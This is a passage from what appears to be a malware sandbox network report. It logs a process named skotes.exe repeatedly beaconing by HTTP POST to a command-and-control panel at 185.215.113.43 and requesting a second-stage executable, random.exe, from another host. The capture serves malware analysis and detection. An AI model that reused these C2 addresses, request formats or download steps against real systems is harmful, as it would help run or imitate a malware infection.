Dec 18, 2024 13:42:36.446069956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.8	50091	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:38.201500893 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:39.543720961 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.8	50092	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:41.168689966 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:42:42.506108999 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.8	50093	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:44.263417006 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:45.593264103 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.8	50094	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:47.231605053 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:42:48.571777105 CET	293	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 37 0d 0a 20 3c 63 3e 31 30 31 36 39 30 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 66 37 30 39 36 34 65 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 67 <c>1016900001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70964e03ac52ea484b411b9dc4e1#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.8	50095	31.41.244.11	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:48.703557014 CET	142	OUT	GET /files/dodo/random.exe HTTP/1.1 Host: 31.41.244.11 If-Modified-Since: Tue, 17 Dec 2024 09:46:16 GMT If-None-Match: "67614868-bae80"
Dec 18, 2024 13:42:50.027949095 CET	191	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:49 GMT Last-Modified: Tue, 17 Dec 2024 09:46:16 GMT Connection: keep-alive ETag: "67614868-bae80"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.8	50096	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:52.414664030 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 39 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016900001&unit=246122658369
Dec 18, 2024 13:42:53.750516891 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.8	50098	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:55.497318983 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:56.829931974 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.8	50100	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:58.466609955 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:42:59.807594061 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.8	50101	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:01.559568882 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:02.925172091 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.8	50104	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:04.562422991 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:05.900540113 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.8	50105	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:07.655324936 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:08.986071110 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.8	50107	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:10.624085903 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:11.972858906 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.8	50109	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:13.722275972 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:15.073601961 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.8	50111	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:16.715158939 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:18.099952936 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.8	50113	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:19.856134892 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:21.257066011 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.8	50115	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:22.886894941 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:24.225071907 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.8	50116	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:25.981025934 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:27.345314026 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.8	50117	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:28.988924980 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:33.435637951 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.8	50118	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:35.184487104 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:36.515290976 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.8	50119	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:38.153600931 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:39.490441084 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.8	50120	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:41.235472918 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:42.573611975 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.8	50121	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:44.213824034 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:45.557640076 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.8	50122	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:47.309508085 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:48.663413048 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.8	50123	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
